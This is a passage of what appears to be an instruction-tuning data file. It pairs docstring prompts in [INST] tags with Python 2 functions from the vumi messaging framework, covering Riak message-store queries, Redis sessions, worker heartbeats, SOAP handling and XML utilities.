+ yield deferred
+ returnValue(token)
+[INST] Count the number of keys in the token's result set.. [/INST] def count_keys_for_token(self, batch_id, token):
+ return self.cache.count_query_results(batch_id, token)
+[INST] Return True or False depending on whether or not the query is
+still running. [/INST] def is_query_in_progress(self, batch_id, token):
+ return self.cache.is_query_in_progress(batch_id, token)
+[INST] Return all inbound message keys with (and ordered by) timestamps.. [/INST] def batch_inbound_keys_with_timestamps(self, batch_id, max_results=None,
+ start=None, end=None,
+ with_timestamps=True):
+ formatter = key_with_ts_only_formatter if with_timestamps else None
+ return self._query_batch_index(
+ self.inbound_messages, batch_id, 'batches_with_addresses',
+ max_results, start, end, formatter)
+[INST] Return all outbound message keys with (and ordered by) timestamps.. [/INST] def batch_outbound_keys_with_timestamps(self, batch_id, max_results=None,
+ start=None, end=None,
+ with_timestamps=True):
+ formatter = key_with_ts_only_formatter if with_timestamps else None
+ return self._query_batch_index(
+ self.outbound_messages, batch_id, 'batches_with_addresses',
+ max_results, start, end, formatter)
+[INST] Return all inbound message keys with (and ordered by) timestamps and
+addresses.. [/INST] def batch_inbound_keys_with_addresses(self, batch_id, max_results=None,
+ start=None, end=None):
+ return self._query_batch_index(
+ self.inbound_messages, batch_id, 'batches_with_addresses',
+ max_results, start, end, key_with_ts_and_value_formatter)
+[INST] Return all outbound message keys with (and ordered by) timestamps and
+addresses.. [/INST] def batch_outbound_keys_with_addresses(self, batch_id, max_results=None,
+ start=None, end=None):
+ return self._query_batch_index(
+ self.outbound_messages, batch_id, 'batches_with_addresses',
+ max_results, start, end, key_with_ts_and_value_formatter)
+[INST] Return all inbound message keys with timestamps and addresses.
+Results are ordered from newest to oldest.. [/INST] def batch_inbound_keys_with_addresses_reverse(self, batch_id,
+ max_results=None,
+ start=None, end=None):
+ if start is not None:
+ start = to_reverse_timestamp(start)
+ if end is not None:
+ end = to_reverse_timestamp(end)
+ start, end = end, start
+ return self._query_batch_index(
+ self.inbound_messages, batch_id, 'batches_with_addresses_reverse',
+ max_results, start, end, key_with_rts_and_value_formatter)
+[INST] Return all outbound message keys with timestamps and addresses.
+Results are ordered from newest to oldest.. [/INST] def batch_outbound_keys_with_addresses_reverse(self, batch_id,
+ max_results=None,
+ start=None, end=None):
+ if start is not None:
+ start = to_reverse_timestamp(start)
+ if end is not None:
+ end = to_reverse_timestamp(end)
+ start, end = end, start
+ return self._query_batch_index(
+ self.outbound_messages, batch_id, 'batches_with_addresses_reverse',
+ max_results, start, end, key_with_rts_and_value_formatter)
+[INST] Return all event keys with timestamps and statuses.
+Results are ordered from newest to oldest.. [/INST] def batch_event_keys_with_statuses_reverse(self, batch_id,
+ max_results=None,
+ start=None, end=None):
+ if start is not None:
+ start = to_reverse_timestamp(start)
+ if end is not None:
+ end = to_reverse_timestamp(end)
+ start, end = end, start
+ return self._query_batch_index(
+ self.events, batch_id, 'batches_with_statuses_reverse',
+ max_results, start, end, key_with_rts_and_value_formatter)
+[INST] Return all event keys with (and ordered by) timestamps and statuses.. [/INST] def message_event_keys_with_statuses(self, msg_id, max_results=None):
+ if max_results is None:
+ max_results = self.DEFAULT_MAX_RESULTS
+ start_value, end_value = self._start_end_values(msg_id, None, None)
+ results = yield self.events.index_keys_page(
+ 'message_with_status', start_value, end_value,
+ return_terms=True, max_results=max_results)
+ returnValue(IndexPageWrapper(
+ key_with_ts_and_value_formatter, self, msg_id, results))
+[INST] Return inbound message stats for the specified time range.
+Currently, message stats include total message count and unique address
+count.. [/INST] def batch_inbound_stats(self, batch_id, max_results=None,
+ start=None, end=None):
+ total = 0
+ unique_addresses = set()
+ start_value, end_value = self._start_end_values(batch_id, start, end)
+ if max_results is None:
+ max_results = self.DEFAULT_MAX_RESULTS
+ raw_page = yield self.inbound_messages.index_keys_page(
+ 'batches_with_addresses', start_value, end_value,
+ return_terms=True, max_results=max_results)
+ page = IndexPageWrapper(
+ key_with_ts_and_value_formatter, self, batch_id, raw_page)
+ while page is not None:
+ results = list(page)
+ total += len(results)
+ unique_addresses.update(addr for key, timestamp, addr in results)
+ page = yield page.next_page()
+ returnValue({
+ "total": total,
+ "unique_addresses": len(unique_addresses),
+ })
+[INST] Return outbound message stats for the specified time range.
+Currently, message stats include total message count and unique address
+count.. [/INST] def batch_outbound_stats(self, batch_id, max_results=None,
+ start=None, end=None):
+ total = 0
+ unique_addresses = set()
+ start_value, end_value = self._start_end_values(batch_id, start, end)
+ if max_results is None:
+ max_results = self.DEFAULT_MAX_RESULTS
+ raw_page = yield self.outbound_messages.index_keys_page(
+ 'batches_with_addresses', start_value, end_value,
+ return_terms=True, max_results=max_results)
+ page = IndexPageWrapper(
+ key_with_ts_and_value_formatter, self, batch_id, raw_page)
+ while page is not None:
+ results = list(page)
+ total += len(results)
+ unique_addresses.update(addr for key, timestamp, addr in results)
+ page = yield page.next_page()
+ returnValue({
+ "total": total,
+ "unique_addresses": len(unique_addresses),
+ })
+[INST] Wrap a raw index page object if it is not None.. [/INST] def _wrap_index_page(self, index_page):
+ if index_page is not None:
+ index_page = type(self)(
+ self._formatter, self._message_store, self._batch_id,
+ index_page)
+ return index_page
+[INST] Fetch the next page of results.. [/INST] def next_page(self):
+ next_page = yield self._index_page.next_page()
+ returnValue(self._wrap_index_page(next_page))
+[INST] Indicate whether there are more results to follow.. [/INST] def has_next_page(self):
+ return self._index_page.has_next_page()
+[INST] Post-migrate function to be used with `vumi_model_migrator` to add batches
+to stored events that don't have any.. [/INST] def add_batches_to_event(stored_event):
+ if stored_event.batches.keys():
+ returnValue(False)
+ outbound_messages = stored_event.manager.proxy(OutboundMessage)
+ msg_record = yield outbound_messages.load(stored_event.message.key)
+ if msg_record is not None:
+ for batch_id in msg_record.batches.keys():
+ stored_event.batches.add_key(batch_id)
+ returnValue(True)
+[INST] Publishes a status if it is not a repeat of the previously
+published status.. [/INST] def add_status(self, **kw):
+ if self.status_detect.check_status(**kw):
+ return self.publish_status(**kw)
+ return succeed(None)
+[INST] Can be overridden by subclasses to do something when the
+response time is high enough for the transport to be considered
+non-functioning.. [/INST] def on_down_response_time(self, message_id, time):
+ pass
+[INST] Can be overridden by subclasses to do something when the
+response time is high enough for the transport to be considered
+running in a degraded state.. [/INST] def on_degraded_response_time(self, message_id, time):
+ pass
+[INST] Can be overridden by subclasses to do something when the
+response time is low enough for the transport to be considered
+running normally.. [/INST] def on_good_response_time(self, message_id, time):
+ pass
+[INST] helper to check whether a config key is defined. Only used for
+verifying dict fields in the new-style configs. [/INST] def assert_field(cfg, key):
+ if key not in cfg:
+ raise ConfigError("Expected '%s' field in config" % key)
+[INST] Compute the number of worker instances running on each host.. [/INST] def _compute_host_info(self, instances):
+ counts = {}
+ for ins in instances:
+ counts[ins.hostname] = 0
+ for ins in instances:
+ counts[ins.hostname] = counts[ins.hostname] + 1
+ return counts
+[INST] Verify whether enough workers checked in.
+Make sure to call snapshot() before running this method. [/INST] def audit(self, storage):
+ count = len(self._instances)
+ if (count >= self.min_procs) and (self.procs_count < self.min_procs):
+ yield storage.delete_worker_issue(self.worker_id)
+ if count < self.min_procs:
+ issue = WorkerIssue("min-procs-fail", time.time(), count)
+ yield storage.open_or_update_issue(self.worker_id, issue)
+ self.procs_count = count
+[INST] This method must be run before any diagnostic audit and analyses
+What it does is clear the instances_active set in preparation for
+all the instances which will check-in in the next interval.
+
+All diagnostics are based on the _instances_active set, which
+holds all the instances which checked-in the previous interval.. [/INST] def snapshot(self):
+ self._instances = self._instances_active
+ self._instances_active = set()
+[INST] Parse configuration and populate in-memory state. [/INST] def parse_config(self, config):
+ systems = []
+ workers = {}
+ for sys in config.values():
+ assert_field(sys, 'workers')
+ assert_field(sys, 'system_id')
+ system_id = sys['system_id']
+ system_workers = []
+ for wkr_entry in sys['workers'].values():
+ assert_field(wkr_entry, 'name')
+ assert_field(wkr_entry, 'min_procs')
+ worker_name = wkr_entry['name']
+ min_procs = wkr_entry['min_procs']
+ wkr = Worker(system_id,
+ worker_name,
+ min_procs)
+ workers[wkr.worker_id] = wkr
+ system_workers.append(wkr)
+ systems.append(System(system_id, system_id, system_workers))
+ return systems, workers
+[INST] Iterate over worker instance sets and check to see whether any have not
+checked-in on time.
+
+We call snapshot() first, since the execution of tasks here is
+interleaved with the processing of worker heartbeat messages.. [/INST] def _periodic_task(self):
+ for wkr in self._workers.values():
+ wkr.snapshot()
+ for wkr in self._workers.values():
+ yield wkr.audit(self._storage)
+ yield self._sync_to_storage()
+[INST] Create a timer task to check for missing worker. [/INST] def _start_task(self):
+ self._task = LoopingCall(self._periodic_task)
+ self._task_done = self._task.start(self.deadline, now=False)
+ errfn = lambda failure: log.err(failure,
+ "Heartbeat verify: timer task died")
+ self._task_done.addErrback(errfn)
+[INST] Find vumi message ids associated with SMPP sequence numbers.. [/INST] def lookup_message_ids(self, service, seq_nums):
+ lookup_func = service.message_stash.get_sequence_number_message_id
+ return gatherResults([lookup_func(seq_num) for seq_num in seq_nums])
+[INST] Clean-up of setup done in setup_application should happen here.. [/INST] def teardown_application(self):
+ pass
+[INST] Respond to a new session.
+Defaults to calling consume_user_message.. [/INST] def new_session(self, message):
+ return self.consume_user_message(message)
+[INST] Close a session.
+The .reply_to() method should not be called when the session is closed.. [/INST] def close_session(self, message):
+ pass
+[INST] Check that endpoint is in the list of allowed endpoints.. [/INST] def check_endpoint(allowed_endpoints, endpoint):
+ if allowed_endpoints is None:
+ return
+ if endpoint is None:
+ endpoint = "default"
+ if endpoint not in allowed_endpoints:
+ raise InvalidEndpoint(
+ "Endpoint %r not defined in list of allowed endpoints %r"
+ % (endpoint, allowed_endpoints))
+[INST] Make an AST node with the relevant bits attached.. [/INST] def _mknode(cls, **kw):
+ node = cls()
+ node.lineno = 0
+ node.col_offset = 0
+ for k, v in kw.items():
+ setattr(node, k, v)
+ return node
+[INST] Create a function that has a nice signature and calls out to ``func``.. [/INST] def make_function(name, func, args, vararg=None, kwarg=None, defaults=()):
+ dflts = [("default_%s" % i, d) for i, d in enumerate(defaults)]
+ a_args = [_param(a) for a in args]
+ a_defaults = [_load(k) for k, v in dflts]
+ c_args = [_load(a) for a in args[:len(args) - len(defaults)]]
+ c_keywords = [_kw(a) for a in args[len(args) - len(defaults):]]
+ call = Call(func=_load('func'), args=c_args, keywords=c_keywords,
+ starargs=(vararg and _load(vararg)),
+ kwargs=(kwarg and _load(kwarg)))
+ func_def = FunctionDef(
+ name=name, args=arguments(
+ args=a_args, vararg=vararg, kwarg=kwarg, defaults=a_defaults),
+ body=[Return(value=call)], decorator_list=[])
+ locs = {}
+ globs = dict(globals(), func=func, **dict(dflts))
+ eval(compile(Module(body=[func_def]), '', 'exec'), globs, locs)
+ return locs[name]
+[INST] Fetch the next page of results.. [/INST] def next_page(self):
+ if not self.has_next_page():
+ return None
+ try:
+ result = self._index_page.next_page()
+ except RiakError as e:
+ raise VumiRiakError(e)
+ return type(self)(result)
+[INST] Call a function that touches the network and wrap the result in this
+class.. [/INST] def _call_and_wrap(self, func):
+ return type(self)(func())
+[INST] Create an `SmsMessage` instance from an ElementTree element.. [/INST] def from_element(cls, root):
+ return cls(
+ message=gettext(root, 'message'),
+ sender_address=gettext(
+ root, 'senderAddress', parse=normalize_address),
+ service_activation_number=gettext(
+ root, 'smsServiceActivationNumber', parse=normalize_address),
+ timestamp=gettext(root, 'dateTime', parse=iso8601.parse_date))
+[INST] Create a `DeliveryInformation` instance from an ElementTree element.. [/INST] def from_element(cls, root):
+ try:
+ delivery_status = gettext(
+ root, 'deliveryStatus', parse=DeliveryStatus.lookupByName)
+ except ValueError, e:
+ raise ValueError(
+ 'No such delivery status enumeration value: %r' % (str(e),))
+ else:
+ return cls(
+ address=gettext(root, 'address', parse=normalize_address),
+ delivery_status=delivery_status)
+[INST] Process a SOAP request and convert any exceptions into SOAP faults.. [/INST] def render_POST(self, request):
+ def _writeResponse(response):
+ request.setHeader('Content-Type', 'text/xml; charset="utf-8"')
+ request.write(tostring(soap_envelope(response)))
+ request.finish()
+ def _handleSuccess(result):
+ request.setResponseCode(http.OK)
+ return result
+ def _handleError(f):
+ log.err(f, 'Failure processing SOAP request')
+ request.setResponseCode(http.INTERNAL_SERVER_ERROR)
+ faultcode = u'soapenv:Server'
+ if f.check(SoapFault):
+ return f.value.to_element()
+ return soap_fault(faultcode, f.getErrorMessage())
+ try:
+ tree = parse_document(request.content)
+ body, header = unwrap_soap_envelope(tree)
+ except:
+ d = fail()
+ else:
+ d = maybeDeferred(self.process, request, body, header)
+ d.addCallback(_handleSuccess)
+ d.addErrback(_handleError)
+ d.addCallback(_writeResponse)
+ return NOT_DONE_YET
+[INST] Process a received text message.. [/INST] def process_notifySmsReception(self, root, header, name):
+ linkid = None
+ if header is not None:
+ linkid = gettext(header, './/' + str(PARLAYX_COMMON_NS.linkid))
+ correlator = gettext(root, NOTIFICATION_NS.correlator)
+ message = SmsMessage.from_element(
+ elemfind(root, NOTIFICATION_NS.message))
+ d = maybeDeferred(
+ self.callback_message_received, correlator, linkid, message)
+ d.addCallback(
+ lambda ignored: NOTIFICATION_NS.notifySmsReceptionResponse())
+ return d
+[INST] Process a text message delivery receipt.. [/INST] def process_notifySmsDeliveryReceipt(self, root, header, name):
+ correlator = gettext(root, NOTIFICATION_NS.correlator)
+ delivery_info = DeliveryInformation.from_element(
+ elemfind(root, NOTIFICATION_NS.deliveryStatus))
+ d = maybeDeferred(self.callback_message_delivered,
+ correlator, delivery_info.delivery_status.value)
+ d.addCallback(
+ lambda ignored: NOTIFICATION_NS.notifySmsDeliveryReceiptResponse())
+ return d
+[INST] Periodically clean out old buckets and calculate aggregates.. [/INST] def check_buckets(self):
+ current_ts_key = self._ts_key(self._time() - self.lag) - 1
+ for ts_key in self.buckets.keys():
+ if ts_key <= self._last_ts_key:
+ log.err(DiscardedMetricError("Throwing way old metric data: %r"
+ % self.buckets[ts_key]))
+ del self.buckets[ts_key]
+ elif ts_key <= current_ts_key:
+ aggregates = []
+ ts = ts_key * self.bucket_size
+ items = self.buckets[ts_key].iteritems()
+ for metric_name, (agg_set, values) in items:
+ values = [v for t, v in sorted(values)]
+ for agg_name in agg_set:
+ agg_metric = "%s.%s" % (metric_name, agg_name)
+ agg_func = Aggregator.from_name(agg_name)
+ agg_value = agg_func(values)
+ aggregates.append((agg_metric, agg_value))
+ for agg_metric, agg_value in aggregates:
+ self.publisher.publish_aggregate(agg_metric, ts,
+ agg_value)
+ del self.buckets[ts_key]
+ self._last_ts_key = current_ts_key
+[INST] Builds a request URL with the appropriate params.. [/INST] def make_request(self, path, qparams):
+ args = {
+ 'messageid': TransportMessage.generate_id(),
+ 'time': self.today.strftime('%Y.%m.%d %H:%M:%S'),
+ 'sender': '0041791234567',
+ 'destination': '9292',
+ 'provider': 'provider',
+ 'keyword': '',
+ 'header': '',
+ 'text': '',
+ 'keyword': '',
+ }
+ args.update(qparams)
+ url = self.transport_url + path
+ return http_request_full(url, urlencode(args), {
+ 'Content-Type': ['application/x-www-form-urlencoded'],
+ })
+[INST] Invoke the canned response for the method name ``name`` and log the
+invocation.. [/INST] def _invoke_response(self, name, args):
+ self.calls.append((name, args))
+ return self.responses[name]()
+[INST] Find or create a hangman game for this player.
+Then process the user's message.. [/INST] def consume_user_message(self, msg):
+ content = msg['content'].encode('utf-8') if msg['content'] else None
+ log.msg("User message: %s" % content)
+ text = msg['content']
+ if text is None:
+ reply = self.get_help()
+ else:
+ reply = self.process_message(text)
+ return self.reply_to(msg, reply)
+[INST] Copy dynamic field values from old data to new data.. [/INST] def copy_dynamic_values(self, *dynamic_prefixes):
+ for prefix in dynamic_prefixes:
+ for key in self.old_data:
+ if key.startswith(prefix):
+ self.new_data[key] = self.old_data[key]
+[INST] Add a new index value to new data.. [/INST] def add_index(self, index, value):
+ if index is None:
+ index = ''
+ else:
+ index = str(index)
+ if isinstance(value, unicode):
+ value = value.encode('utf-8')
+ self.new_index.setdefault(index, []).append(value)
+[INST] Called when a field value changes.. [/INST] def _field_changed(self, changed_field_name):
+ already_notifying = bool(self._fields_changed)
+ if changed_field_name not in self._fields_changed:
+ self._fields_changed.append(changed_field_name)
+ if not already_notifying:
+ self._notify_fields_changed()
+[INST] Save the object to Riak.. [/INST] def save(self):
+ return self.manager.store(self)
+[INST] Delete the object from Riak.. [/INST] def delete(self):
+ return self.manager.delete(self)
+[INST] Load an object from Riak.. [/INST] def load(cls, manager, key, result=None):
+ return manager.load(cls, key, result=result)
+[INST] Load batches of objects for the given list of keys.. [/INST] def load_all_bunches(cls, manager, keys):
+ return manager.load_all_bunches(cls, keys)
+[INST] Find object keys by index.. [/INST] def index_keys(cls, manager, field_name, value, end_value=None,
+ return_terms=None):
+ index_name, start_value, end_value = index_vals_for_field(
+ cls, field_name, value, end_value)
+ return manager.index_keys(
+ cls, index_name, start_value, end_value, return_terms=return_terms)
+[INST] Find object keys by index, using pagination.. [/INST] def index_keys_page(cls, manager, field_name, value, end_value=None,
+ return_terms=None, max_results=None,
+ continuation=None):
+ index_name, start_value, end_value = index_vals_for_field(
+ cls, field_name, value, end_value)
+ return manager.index_keys_page(
+ cls, index_name, start_value, end_value, return_terms=return_terms,
+ max_results=max_results, continuation=continuation)
+[INST] Finds objects in the index that match the regex patterns in query. [/INST] def index_match(cls, manager, query, field_name, value):
+ return manager.mr_from_field_match(cls, query, field_name, value)
+[INST] Search for instances of this model matching keys/values.. [/INST] def search(cls, manager, **kw):
+ for k, value in kw.iteritems():
+ value = unicode(value)
+ value = value.replace('\\', '\\\\')
+ value = value.replace("'", "\\'")
+ kw[k] = value
+ query = " AND ".join("%s:'%s'" % (k, v) for k, v in kw.iteritems())
+ return cls.raw_search(manager, query)
+[INST] Performs a raw riak search, does no inspection on the given query.. [/INST] def raw_search(cls, manager, query):
+ return manager.mr_from_search(cls, query)
+[INST] Performs a real riak search, does no inspection on the given query.. [/INST] def real_search(cls, manager, query, rows=None, start=None):
+ return manager.real_search(cls, query, rows=rows, start=start)
+[INST] Do a regex OR search across the keys found in a secondary index.. [/INST] def from_index_match(cls, mgr, model, query, index_name, start_value,
+ end_value=None):
+ mr = mgr.riak_map_reduce().index(
+ mgr.bucket_name(model), index_name, start_value, end_value).map(
+ """
+ function(value, keyData, arg) {
+ /*
+ skip deleted values, might show up during a test
+ */
+ var values = value.values.filter(function(val) {
+ return !val.metadata['X-Riak-Deleted'];
+ });
+ if(values.length) {
+ var data = JSON.parse(values[0].data);
+ for (j in arg) {
+ var query = arg[j];
+ var content = data[query.key];
+ var regex = RegExp(query.pattern, query.flags)
+ if(content && regex.test(content)) {
+ return [value.key];
+ }
+ }
+ }
+ return [];
+ }
+ """, {
+ 'arg': query,
+ })
+ return cls(mgr, mr)
+[INST] Construct a manager from a dictionary of options.. [/INST] def from_config(cls, config):
+ raise NotImplementedError("Sub-classes of Manager should implement"
+ " .from_config(...)")
+[INST] Close the client underlying this manager instance, if necessary.. [/INST] def close_manager(self):
+ raise NotImplementedError("Sub-classes of Manager should implement"
+ " .close_manager(...)")
+[INST] Load a model instance for the key from Riak.
+If the key doesn't exist, this method should return None
+instead of an instance of cls.. [/INST] def load(self, cls, key, result=None):
+ raise NotImplementedError("Sub-classes of Manager should implement"
+ " .load(...)")
+[INST] Migrate a loaded riak_object to the latest schema version.
+NOTE: This should only be called by subclasses.. [/INST] def _migrate_riak_object(self, modelcls, key, riak_object):
+ was_migrated = False
+ while riak_object.get_data() is not None:
+ data_version = riak_object.get_data().get('$VERSION', None)
+ if data_version == modelcls.VERSION:
+ obj = modelcls(self, key, _riak_object=riak_object)
+ obj.was_migrated = was_migrated
+ return obj
+ migrator = modelcls.MIGRATOR(modelcls, self, data_version)
+ riak_object = migrator(riak_object).get_riak_object()
+ was_migrated = True
+ return None
+[INST] Migrate a riak_object to the required schema version before storing.
+NOTE: This should only be called by subclasses.. [/INST] def _reverse_migrate_riak_object(self, modelobj):
+ riak_object = modelobj._riak_object
+ modelcls = type(modelobj)
+ model_name = "%s.%s" % (modelcls.__module__, modelcls.__name__)
+ store_version = self.store_versions.get(model_name, modelcls.VERSION)
+ data_version = riak_object.get_data().get('$VERSION', None)
+ while data_version != store_version:
+ migrator = modelcls.MIGRATOR(
+ modelcls, self, data_version, reverse=True)
+ riak_object = migrator(riak_object).get_riak_object()
+ data_version = riak_object.get_data().get('$VERSION', None)
+ return riak_object
+[INST] Load the model instances for a batch of keys from Riak.
+If a key doesn't exist, no object will be returned for it.. [/INST] def _load_multiple(self, cls, keys):
+ raise NotImplementedError("Sub-classes of Manager should implement"
+ " ._load_multiple(...)")
+[INST] Load the model instances for a batch of keys from Riak.
+If a key doesn't exist, no object will be returned for it.. [/INST] def _load_bunch_mapreduce(self, model, keys):
+ mr = self.mr_from_keys(model, keys)
+ mr._riak_mapreduce_obj.map(function="""
+ function (v) {
+ values = v.values.filter(function(val) {
+ return !val.metadata['X-Riak-Deleted'];
+ })
+ if (!values.length) {
+ return [];
+ }
+ return [[v.key, values[0]]]
+ }
+ """).filter_not_found()
+ return self.run_map_reduce(
+ mr._riak_mapreduce_obj, lambda mgr, obj: model.load(mgr, *obj))
+[INST] Load the model instances for a batch of keys from Riak.
+If a key doesn't exist, no object will be returned for it.. [/INST] def _load_bunch(self, model, keys):
+ assert len(keys) <= self.load_bunch_size
+ if not keys:
+ return []
+ if self.USE_MAPREDUCE_BUNCH_LOADING:
+ return self._load_bunch_mapreduce(model, keys)
+ else:
+ return self._load_multiple(model, keys)
+[INST] Load batches of model instances for a list of keys from Riak.. [/INST] def load_all_bunches(self, model, keys):
+ while keys:
+ batch_keys = keys[:self.load_bunch_size]
+ keys = keys[self.load_bunch_size:]
+ yield self._load_bunch(model, batch_keys)
+[INST] Run a map reduce instance and return the results mapped to
+objects by the map_function.. [/INST] def run_map_reduce(self, mapreduce, mapper_func=None, reducer_func=None):
+ raise NotImplementedError("Sub-classes of Manager should implement"
+ " .run_map_reduce(...)")
+[INST] Delete *ALL* keys in buckets whose names start buckets with
+this manager's bucket prefix.
+
+Use only in tests.. [/INST] def purge_all(self):
+ raise NotImplementedError("Sub-classes of Manager should implement"
+ " .purge_all()")
+[INST] Create a worker factory, connect to AMQP and return the factory.
+Return value is the AmqpFactory instance containing the worker.. [/INST] def create_worker(self, worker_class, config, timeout=30,
+ bindAddress=None):
+ return self.create_worker_by_class(
+ load_class_by_string(worker_class), config, timeout=timeout,
+ bindAddress=bindAddress)
+[INST] Return a list of active user_ids and associated sessions. Loops over
+known active_sessions, some of which might have auto expired.
+Implements lazy garbage collection, for each entry it checks if
+the user's session still exists, if not it is removed from the set.. [/INST] def active_sessions(self):
+ skey = self.r_key('active_sessions')
+ sessions_to_expire = []
+ for user_id in self.r_server.smembers(skey):
+ ukey = self.r_key('session', user_id)
+ if self.r_server.exists(ukey):
+ yield user_id, self.load_session(user_id)
+ else:
+ sessions_to_expire.append(user_id)
+ for user_ids in sessions_to_expire:
+ self.r_server.srem(skey, user_id)
+[INST] Generate a keyname using this workers prefix. [/INST] def r_key(self, *args):
+ parts = [self.r_prefix]
+ parts.extend(args)
+ return ":".join(parts)
+[INST] Schedule a session to timeout
+Parameters
+
+user_id : str
+The user's id.
+timeout : int
+The number of seconds after which this session should expire. [/INST] def schedule_session_expiry(self, user_id, timeout):
+ ukey = self.r_key('session', user_id)
+ self.r_server.expire(ukey, timeout)
+[INST] Create a new session using the given user_id. [/INST] def create_session(self, user_id, **kwargs):
+ defaults = {
+ 'created_at': time.time()
+ }
+ defaults.update(kwargs)
+ self.save_session(user_id, defaults)
+ if self.max_session_length:
+ self.schedule_session_expiry(user_id, self.max_session_length)
+ return self.load_session(user_id)
+[INST] Save a session
+Parameters
+
+user_id : str
+The user's id.
+session : dict
+The session info, nested dictionaries are not supported. Any
+values that are dictionaries are converted to strings by Redis.. [/INST] def save_session(self, user_id, session):
+ ukey = self.r_key('session', user_id)
+ for s_key, s_value in session.items():
+ self.r_server.hset(ukey, s_key, s_value)
+ skey = self.r_key('active_sessions')
+ self.r_server.sadd(skey, user_id)
+ return session
+[INST] Construct a unique scheduled key.. [/INST] def scheduled_key(self):
+ timestamp = datetime.utcnow()
+ unique_id = uuid4().get_hex()
+ timestamp = timestamp.isoformat().split('.')[0]
+ return self.r_key(".".join(("scheduled", timestamp, unique_id)))
+[INST] Return a list of active user_ids and associated sessions.
+Queries redis for keys starting with the session key prefix. This is
+O(n) over the total number of keys in redis, but this is still pretty
+quick even for millions of keys. Try not to hit this too often, though.. [/INST] def active_sessions(self):
+ keys = yield self.redis.keys('session:*')
+ sessions = []
+ for user_id in [key.split(':', 1)[1] for key in keys]:
+ sessions.append((user_id, (yield self.load_session(user_id))))
+ returnValue(sessions)
+[INST] Schedule a session to timeout
+Parameters
+
+user_id : str
+The user's id.
+timeout : int
+The number of seconds after which this session should expire. [/INST] def schedule_session_expiry(self, user_id, timeout):
+ ukey = "%s:%s" % ('session', user_id)
+ return self.redis.expire(ukey, timeout)
+[INST] Create a new session using the given user_id. [/INST] def create_session(self, user_id, **kwargs):
+ yield self.clear_session(user_id)
+ defaults = {
+ 'created_at': time.time()
+ }
+ defaults.update(kwargs)
+ yield self.save_session(user_id, defaults)
+ if self.max_session_length:
+ yield self.schedule_session_expiry(user_id,
+ int(self.max_session_length))
+ returnValue((yield self.load_session(user_id)))
+[INST] Save a session
+Parameters
+
+user_id : str
+The user's id.
+session : dict
+The session info, nested dictionaries are not supported. Any
+values that are dictionaries are converted to strings by Redis.. [/INST] def save_session(self, user_id, session):
+ ukey = "%s:%s" % ('session', user_id)
+ for s_key, s_value in session.items():
+ yield self.redis.hset(ukey, s_key, s_value)
+ returnValue(session)
+[INST] Application-specific config validation happens in here.
+Subclasses may override this method to perform extra config
+validation.. [/INST] def validate_config(self):
+ pass
+[INST] Create an ElementTree element.
+The element tag name will be this qualified name's
+`QualifiedName.text` value.. [/INST] def element(self, *children, **attrib):
+ return Element(self.text, *children, **attrib)
+[INST] Add children to an element.. [/INST] def _add_children(self, elem, children):
+ for child in children:
+ self._handle_child(elem, child)
+[INST] Set XML attributes on an element.. [/INST] def _set_attributes(self, elem, attrib):
+ for k, v in attrib.items():
+ elem.set(k, v)
+[INST] Add text content to an element.. [/INST] def _add_text(self, elem, text):
+ if len(elem):
+ elem[-1] = (elem[-1].tail or '') + text
+ else:
+ elem.text = (elem.text or '') + text
+[INST] Add a child element to a parent element.
+Child elements can be any of the following.. [/INST] def _handle_child(self, parent, child):
+ if callable(child):
+ child = child()
+ t = self._typemap.get(type(child))
+ if t is None:
+ if etree.iselement(child):
+ parent.append(child)
+ return
+ raise TypeError('Unknown child type: %r' % (child,))
+ v = t(parent, child)
+ if v is not None:
+ self._handle_child(parent, v)
+[INST] Split a fully qualified element name, in Clark's notation, into its URI and
+local name components.. [/INST] def split_qualified(fqname):
+ if fqname and fqname[0] == '{':
+ return tuple(fqname[1:].split('}'))
+ return None, fqname
+[INST] Convert an ElementTree element into a dictionary structure.
+Text content is stored against a special key, ``#text``, unless the element
+contains only text and no attributes.
+
+Attributes are converted into dictionaries of the attribute name, prefixed
+with ``@``, keyed against the attribute value, which are keyed against the
+root element's name.
+
+Child elements are recursively turned into dictionaries. Child elements
+with the same name are coalesced into a ``list``.. [/INST] def element_to_dict(root):
+ d = {root.tag: {} if root.attrib else None}
+ children = root.getchildren()
+ if children:
+ dd = defaultdict(list)
+ for child_dict in map(element_to_dict, children):
+ for k, v in child_dict.iteritems():
+ dd[k].append(v)
+ d = {root.tag: dict((k, v[0] if len(v) == 1 else v)
+ for k, v in dd.iteritems())}
+ if root.attrib:
+ d[root.tag].update(
+ ('@' + str(k), v) for k, v in root.attrib.iteritems())
+ if root.text:
+ text = root.text.strip()
+ if children or root.attrib:
+ if text:
+ d[root.tag]['#text'] = text
+ else:
+ d[root.tag] = text
+ return d
+[INST] Clean-up of setup done in setup_transport should happen here.. [/INST] def teardown_transport(self):
+ pass
+[INST] Publish a :class:`TransportUserMessage` message.
+Some default parameters are handled, so subclasses don't have
+to provide a lot of boilerplate.. [/INST] def publish_message(self, **kw):
+ kw.setdefault('transport_name', self.transport_name)
+ kw.setdefault('transport_metadata', {})
+ msg = TransportUserMessage(**kw)
+ return self.connectors[self.transport_name].publish_inbound(msg)
+[INST] Publish a :class:`TransportEvent` message.
+Some default parameters are handled, so subclasses don't have
+to provide a lot of boilerplate.. [/INST] def publish_event(self, **kw):
+ kw.setdefault('transport_name', self.transport_name)
+ kw.setdefault('transport_metadata', {})
+ event = TransportEvent(**kw)
+ return self.connectors[self.transport_name].publish_event(event)
+[INST] Helper method for publishing a status message.. [/INST] def publish_status(self, **kw):
+ msg = TransportStatus(**kw)
+ if self._should_publish_status:
+ conn = self.connectors[self.status_connector_name]
+ return conn.publish_status(msg)
+ else:
+ self.log.debug(
+ 'Status publishing disabled for transport %r, ignoring '
+ 'status %r' % (self.transport_name, msg))
+ return succeed(msg)
+[INST] This must be overridden to read outbound messages and do the right
+thing with them.. [/INST] def handle_outbound_message(self, message):
+ raise NotImplementedError()
+[INST] Emulate an inbound message from SMSSync on an Android phone.. [/INST] def smssync_inbound(self, content, from_addr='123', to_addr='555',
+ timestamp=None, message_id='1', secret=None):
+ msginfo = self.default_msginfo()
+ if timestamp is None:
+ timestamp = datetime.datetime.utcnow()
+ if hasattr(timestamp, 'strftime'):
+ timestamp = timestamp.strftime("%m-%d-%y %H:%M")
+ if secret is None:
+ secret = msginfo.smssync_secret
+ params = {
+ 'sent_to': to_addr,
+ 'from': from_addr,
+ 'message': content,
+ 'sent_timestamp': timestamp,
+ 'message_id': message_id,
+ 'secret': secret,
+ }
+ return self.smssync_call(params, method='POST')
+[INST] Return the game state as a dict.. [/INST] def state(self):
+ return {
+ 'guesses': u"".join(sorted(self.guesses)),
+ 'word': self.word,
